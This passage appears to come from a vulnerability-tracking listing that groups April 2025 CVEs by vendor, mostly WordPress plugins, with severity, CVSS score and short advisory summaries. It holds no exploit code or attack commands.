|---|---|---|---|---|---|
CVE-2025-31394 | High | 7.1 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kailey (trepmal) More Mime Type Filters more-mime-type-filters allows Stored XSS. This issue affects More Mime Type Filters: from n/a thro… |
Kaizencoders · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32632 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in KaizenCoders Automatic Ban IP automatic-ban-ip allows Reflected XSS. This issue affects Automatic Ban IP: from n/a through <= 1.0.7. |
Kendysond · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-10894 | Medium | 6.4 | — | 2025-04-10 | The Payment Forms for Paystack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes like 'datepicker', 'textarea', and 'text' in all versions up to, and including, 4.0.2 due to insufficient input sa… |
Ketanajani · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32558 | High | 8.5 | — | 2025-04-11 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ketanajani Duplicate Title Checker duplicate-title-checker allows Blind SQL Injection. This issue affects Duplicate Title Checker: from n/… |
Kevon Adonis · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32591 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Kevon Adonis WP Abstracts wp-abstracts-manuscripts-manager allows Cross Site Request Forgery. This issue affects WP Abstracts: from n/a through <= 2.7.5. |
Keycaptcha · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32619 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in KeyCAPTCHA KeyCAPTCHA keycaptcha allows Stored XSS. This issue affects KeyCAPTCHA: from n/a through <= 2.5.1. |
Koajs · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32379 | Medium | 5.0 | — | 2025-04-09 | Koa is expressive middleware for Node.js using ES2017 async functions. |
Labcat · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32206 | Critical | 9.1 | — | 2025-04-10 | Unrestricted Upload of File with Dangerous Type vulnerability in LABCAT Processing Projects processing-projects allows Upload a Web Shell to a Web Server. This issue affects Processing Projects: from n/a through <= 1.0.2. |
Langflow · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3248 | Critical | 9.8 | KEV | 2025-04-07 | Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint. |
Lemmentwickler · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32502 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in lemmentwickler ePaper Lister for Yumpu magazine-lister-for-yumpu allows Stored XSS. This issue affects ePaper Lister for Yumpu: from n/a through <= 1.4.0. |
Lenovo · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-11679 | Medium | 4.4 | — | 2025-04-11 | An input validation weakness was reported in the TpmSetup module for some legacy System x server products that could allow a local attacker with elevated privileges to read the contents of memory. |
Lenve · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3398 | Medium | 6.3 | — | 2025-04-08 | A vulnerability classified as critical was found in lenve VBlog up to 1.0.0. |
Libbpf_project · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-29481 | Medium | 6.2 | — | 2025-04-07 | Buffer Overflow vulnerability in libbpf 1.5.0 allows a local attacker to execute arbitrary code via the bpf_object__init_prog function of libbpf. |
Lisandro Martinez · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31565 | Critical | 9.3 | — | 2025-04-11 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Lisandro Martinez WPSmartContracts wp-smart-contracts allows Blind SQL Injection. This issue affects WPSmartContracts: from n/a through <=… |
Lucee · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-55354 | High | 8.8 | — | 2025-04-08 | Lucee before 5.4.7.3 LTS and 6 before 6.1.1.118, when an attacker can place files on the server, is vulnerable to a protection mechanism failure that can let an attacker run code that would be expected to be blocked and access resources th… |
Maennchen1.de · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32164 | Medium | 6.5 | — | 2025-04-08 | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in maennchen1.de m1.DownloadList m1downloadlist allows Retrieve Embedded Sensitive Data.This issue affects m1.DownloadList: from n/a through <= 0.24. |
Mapgeo · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32525 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MapGeo Interactive Geo Maps interactive-geo-maps allows Reflected XSS. This issue affects Interactive Geo Maps: from n/a through <= 1.6.24. |
Mario Aguiar · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32478 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Mario Aguiar WP SexyLightBox wp-sexylightbox allows Stored XSS. This issue affects WP SexyLightBox: from n/a through <= 0.5.3. |
Mathieu Chartier · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32484 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Mathieu Chartier WP-Planification wp-planification allows Stored XSS. This issue affects WP-Planification: from n/a through <= 2.3.1. |
Mattermost · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-24866 | Low | 2.7 | — | 2025-04-10 | Mattermost versions 9.11.x <= 9.11.8 fail to enforce proper access controls on the /api/v4/audits endpoint, allowing users with delegated granular administration roles who lack access to Compliance Monitoring to retrieve User Activity Log… |
Melapress · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2876 | Medium | 5.3 | — | 2025-04-08 | The MelaPress Login Security and MelaPress Login Security Premium plugins for WordPress are vulnerable to unauthorized loss of data due to a missing capability check on the 'monitor_admin_actions' function in version 2.1.0. |
Melhorenvio · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-13820 | Medium | 5.3 | — | 2025-04-08 | The Melhor Envio plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.15.11 via the 'run' function, which uses a hardcoded hash. |
Mergado · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32669 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in MERGADO Mergado Pack mergado-marketing-pack allows Stored XSS. This issue affects Mergado Pack: from n/a through <= 4.2.1. |
Mestres Do Wp · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32695 | Critical | 9.8 | — | 2025-04-09 | Incorrect Privilege Assignment vulnerability in Mestres do WP Checkout Mestres WP checkout-mestres-wp allows Privilege Escalation. This issue affects Checkout Mestres WP: from n/a through <= 8.7.5. |
Metabase · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32382 | — | — | — | 2025-04-10 | Metabase is an open source Business Intelligence and Embedded Analytics tool. |
Miunosoft · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32599 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in miunosoft Task Scheduler task-scheduler allows Reflected XSS. This issue affects Task Scheduler: from n/a through <= 1.6.3. |
Mlc-ai · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32381 | Medium | 6.5 | — | 2025-04-09 | XGrammar is an open-source library for efficient, flexible, and portable structured generation. |
Mmetrodw · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31401 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in mmetrodw MMX – Make Me Christmas mmx-make-me-christmas allows Stored XSS. This issue affects MMX – Make Me Christmas: from n/a through <= 1.0.0. |
Mrcen · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3393 | Low | 3.5 | — | 2025-04-08 | A vulnerability was found in mrcen springboot-ucan-admin up to 5f35162032cbe9288a04e429ef35301545143509. |
Myworks · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32524 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MyWorks MyWorks WooCommerce Sync for QuickBooks Online myworks-woo-sync-for-quickbooks-online allows Reflected XSS. This issue affects MyW… |
N-media · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31599 | Critical | 9.3 | — | 2025-04-11 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in N-Media Bulk Product Sync sync-wc-google allows SQL Injection. This issue affects Bulk Product Sync: from n/a through <= 8.6. |
Nababur · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3489 | Medium | 4.3 | — | 2025-04-10 | A vulnerability was found in Nababur Simple-User-Management-System 1.0. |
Nakivo · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32406 | High | 8.6 | — | 2025-04-08 | An XXE issue in the Director NBR component in NAKIVO Backup & Replication 10.3.x through 11.0.1 before 11.0.2 allows remote attackers to fetch and parse the XML response. |
Neoslab · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32633 | High | 8.6 | — | 2025-04-11 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in neoslab Database Toolset database-toolset allows Path Traversal. This issue affects Database Toolset: from n/a through <= 1.8.4. |
Newsboard Plugin · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31402 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in NewsBoard Plugin NewsBoard Post and RSS Scroller newsboard allows Stored XSS. This issue affects NewsBoard Post and RSS Scroller: from n/a through <= 1.2.12. |
Nik00726 · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2019-25223 | Medium | 4.9 | — | 2025-04-08 | The Team Circle Image Slider With Lightbox plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.4 due to insufficient escaping on the user supplied parameter and lack of suffi… |
Nimbata · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32616 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in nimbata Nimbata Call Tracking nimbata-call-tracking allows Stored XSS. This issue affects Nimbata Call Tracking: from n/a through <= 1.7.4. |
Ninotheme · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32481 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in ninotheme Nino Social Connect nino-social-connect allows Stored XSS. This issue affects Nino Social Connect: from n/a through <= 2.0. |
Nirmal Kumar Ram · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32140 | Critical | 9.9 | — | 2025-04-10 | Unrestricted Upload of File with Dangerous Type vulnerability in Nirmal Kumar Ram WP Remote Thumbnail wp-remote-thumbnail allows Upload a Web Shell to a Web Server. This issue affects WP Remote Thumbnail: from n/a through <= 1.3.2. |
Odude · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32589 | High | 8.1 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in odude Flexi – Guest Submit flexi allows PHP Local File Inclusion. This issue affects Flexi – Guest Submit: from n/a thr… |
Oleglark · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32498 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in oleglark VKontakte Cross-Post vkontakte-cross-post allows Stored XSS. This issue affects VKontakte Cross-Post: from n/a through <= 0.3.2. |
Opplus · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3413 | Medium | 6.3 | — | 2025-04-08 | A vulnerability has been found in opplus springboot-admin up to a2d5310f44fd46780a8686456cf2f9001ab8f024 and classified as critical. |
Oxygensuite · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32631 | High | 8.6 | — | 2025-04-11 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in oxygensuite Oxygen MyData for WooCommerce oxygen-mydata allows Path Traversal. This issue affects Oxygen MyData for WooCommerce: from n/a throug… |
Oz Forensics · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32367 | High | 8.6 | — | 2025-04-11 | The Oz Forensics face recognition application before 4.0.8 late 2023 allows PII retrieval via /statistic/list Insecure Direct Object Reference. |
Pagopar - Grupo M S.a. · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31032 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Pagopar - Grupo M S.A. |
Panasonic · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-1073 | High | 7.5 | — | 2025-04-10 | Panasonic IR Control Hub (IR Blaster) versions 1.17 and earlier may allow an attacker with physical access to load unauthorized firmware onto the device. |
Payphone · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32523 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in payphone WooCommerce – Payphone Gateway wc-payphone-gateway allows Reflected XSS. This issue affects WooCommerce – Payphone Gateway: from… |
Phil · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31012 | Medium | 5.3 | — | 2025-04-09 | Missing Authorization vulnerability in Phil Age Gate age-gate allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Age Gate: from n/a through <= 3.5.4. |
Pickupp · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32587 | High | 8.1 | — | 2025-04-11 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in pickupp WooCommerce Pickupp wc-pickupp allows PHP Local File Inclusion. This issue affects WooCommerce Pickupp: from n/a through <= 2.4.3. |
Picture-planet Gmbh · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32676 | High | 7.6 | — | 2025-04-09 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Picture-Planet GmbH Verowa Connect verowa-connect allows Blind SQL Injection. This issue affects Verowa Connect: from n/a through <= 3.0.5. |
Pimcore · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30166 | Medium | 4.8 | — | 2025-04-08 | Pimcore's Admin Classic Bundle provides a Backend UI for Pimcore. |
Piotnetdotcom · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32205 | Low | 2.7 | — | 2025-04-10 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in piotnetdotcom Piotnet Forms piotnetforms. This issue affects Piotnet Forms: from n/a through <= 1.0.30. |
Plainware · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32623 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in plainware PlainInventory z-inventory-manager allows Stored XSS. This issue affects PlainInventory: from n/a through <= 3.1.9. |
Powerdns · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30195 | High | 7.5 | — | 2025-04-07 | An attacker can publish a zone containing specific Resource Record Sets. |
Programphases · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31379 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in programphases Insert HTML Here insert-html-here allows Reflected XSS. This issue affects Insert HTML Here: from n/a through <= 1.0. |
Progress Software Corporation · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-1968 | High | 7.7 | — | 2025-04-09 | Insufficient Session Expiration vulnerability in Progress Software Corporation Sitefinity under some specific and uncommon circumstances allows reusing Session IDs (Session Replay Attacks). This issue affects Sitefinity: from 14.0 through 1… |
Propanetank · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2017-20197 | High | 7.3 | — | 2025-04-09 | A vulnerability was found in propanetank Roommate-Bill-Tracking up to 288437f658fc9ee7d4b92a9da12557024d8bc55c. |
Purab · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31023 | High | 8.8 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Purab Seo Meta Tags seo-meta-tags allows Cross Site Request Forgery. This issue affects Seo Meta Tags: from n/a through <= 1.4. |
Quanganhdo · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32482 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in quanganhdo Custom Smilies custom-smilies allows Stored XSS. This issue affects Custom Smilies: from n/a through <= 1.2. |
Rachel Cherry · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32537 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rachel Cherry Lock Your Updates lock-your-updates allows Reflected XSS. This issue affects Lock Your Updates: from n/a through <= 1.1. |
Radiustheme · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32656 | High | 8.1 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in RadiusTheme Testimonial Slider And Showcase Pro testimonial-slider-showcase-pro allows PHP Local File Inclusion. This i… |
Rafasashi · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32612 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in rafasashi User Session Synchronizer user-session-synchronizer allows Stored XSS. This issue affects User Session Synchronizer: from n/a through <= 1.4.0. |
Rameez Iqbal · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32668 | High | 8.1 | — | 2025-04-10 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Rameez Iqbal Real Estate Manager real-estate-manager allows PHP Local File Inclusion. This issue affects Real Estate Ma… |
Rankology · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32491 | Critical | 9.8 | — | 2025-04-11 | Incorrect Privilege Assignment vulnerability in Rankology Rankology SEO – On-site SEO rankology-seo-all-in-one-seo-analytics allows Privilege Escalation. This issue affects Rankology SEO – On-site SEO: from n/a through <= 2.2.4. |
Ratta · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32409 | High | 8.1 | — | 2025-04-07 | Ratta SuperNote A6 X2 Nomad before December 2024 allows remote code execution because an arbitrary firmware image (signed with debug keys) can be sent to TCP port 60002, and placed into the correct image-update location as a consequence of… |
Realmag777 · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32569 | Critical | 9.8 | — | 2025-04-11 | Deserialization of Untrusted Data vulnerability in RealMag777 TableOn posts-table-filterable allows Object Injection. This issue affects TableOn: from n/a through <= 1.0.4.3. |
Regen · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31391 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in regen Script Compressor script-compressor allows Stored XSS. This issue affects Script Compressor: from n/a through <= 1.7.1. |
Remcohaszing · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32014 | — | — | — | 2025-04-07 | estree-util-value-to-estree converts a JavaScript value to an ESTree expression. |
Renrenio · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3387 | Low | 3.5 | — | 2025-04-07 | A vulnerability classified as problematic has been found in renrenio renren-security up to 5.4.0. |
Reve Chat · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32559 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in REVE Chat REVE Chat revechat allows Stored XSS. This issue affects REVE Chat: from n/a through <= 6.4.4. |
Robert Noakes · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31017 | Medium | 6.5 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Robert Noakes Nav Menu Manager noakes-menu-manager allows Stored XSS. This issue affects Nav Menu Manager: from n/a through <= 3.2.5. |
Roninwp · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32663 | High | 8.1 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in roninwp FAT Cooming Soon fat-coming-soon allows PHP Local File Inclusion. This issue affects FAT Cooming Soon: from n/a… |
Rtakao · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31042 | Medium | 5.3 | — | 2025-04-09 | Missing Authorization vulnerability in rtakao Sandwich Adsense firsth3tagadsense allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sandwich Adsense: from n/a through <= 4.0.2. |
Rustaurius · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32694 | Medium | 4.7 | — | 2025-04-09 | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Rustaurius Ultimate WP Mail ultimate-wp-mail allows Phishing. This issue affects Ultimate WP Mail: from n/a through <= 1.3.10. |
Sandeep Verma · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32536 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sandeep Verma HTML5 Video Player with Playlist html5-video-player-with-playlist allows Reflected XSS. This issue affects HTML5 Video Playe… |
Sandor Kovacs · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32556 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Sandor Kovacs Simple Post Meta Manager simple-post-meta-manager allows Reflected XSS. This issue affects Simple Post Meta Manager: from n/a through <= 1.0.9. |
Sap · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31332 | Medium | 6.6 | — | 2025-04-08 | Due to insecure file permissions in SAP BusinessObjects Business Intelligence Platform, an attacker who has local access to the system could modify files, potentially disrupting operations or causing service downtime, hence leading to a high i… |
Scott Salisbury · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32483 | Medium | 5.9 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scott Salisbury Request Call Back request-call-back allows Stored XSS. This issue affects Request Call Back: from n/a through <= 1.4.1. |
Seeyon · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3402 | Medium | 6.3 | — | 2025-04-08 | A vulnerability was found in Seeyon Zhiyuan Interconnect FE Collaborative Office Platform 5.5.2 and classified as critical. |
Senior-walter · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3383 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in SourceCodester Web-based Pharmacy Product Management System 1.0 and classified as critical. |
Shahjada · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32279 | Medium | 4.3 | — | 2025-04-08 | Missing Authorization vulnerability in Shahjada Live Forms liveforms. This issue affects Live Forms: from n/a through <= 4.8.5. |
Shameem Reza · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31392 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Shameem Reza Smart Product Gallery Slider smart-product-gallery-slider allows Cross Site Request Forgery. This issue affects Smart Product Gallery Slider: from n/a through <= 1.0.4. |
Sharethis · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32282 | Medium | 4.3 | — | 2025-04-10 | Cross-Site Request Forgery (CSRF) vulnerability in ShareThis ShareThis Dashboard for Google Analytics googleanalytics. This issue affects ShareThis Dashboard for Google Analytics: from n/a through <= 3.2.3. |
Smartdevth · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3433 | Medium | 6.1 | — | 2025-04-08 | The Advanced Advertising System plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.3.1. |
Sodena · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31383 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in sodena FrescoChat Live Chat flexytalk-widget allows Stored XSS. This issue affects FrescoChat Live Chat: from n/a through <= 3.2.6. |
Softclever Limited · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32579 | Critical | 9.9 | — | 2025-04-11 | Unrestricted Upload of File with Dangerous Type vulnerability in SoftClever Limited Sync Posts sync-posts allows Upload a Web Shell to a Web Server. This issue affects Sync Posts: from n/a through <= 1.0. |
Solwininfotech · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32677 | High | 7.6 | — | 2025-04-09 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in solwininfotech WP Social Stream Designer social-stream-design allows Blind SQL Injection. This issue affects WP Social Stream Designer: fr… |
Specia Theme · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32212 | Medium | 6.5 | — | 2025-04-10 | Missing Authorization vulnerability in Specia Theme Specia Companion specia-companion allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Specia Companion: from n/a through <= 6.3. |
Spring · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-22232 | Medium | 5.3 | — | 2025-04-10 | Spring Cloud Config Server may not use Vault token sent by clients using a X-CONFIG-TOKEN header when making requests to Vault. |
Squiter · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32497 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in squiter Spoiler Block spoiler-block allows Stored XSS. This issue affects Spoiler Block: from n/a through <= 1.7. |
Stringfold · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3417 | High | 8.8 | — | 2025-04-10 | The Embedder plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the ajax_set_global_option() function in versions 1.3 to 1.3.5. |
Studi7 · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
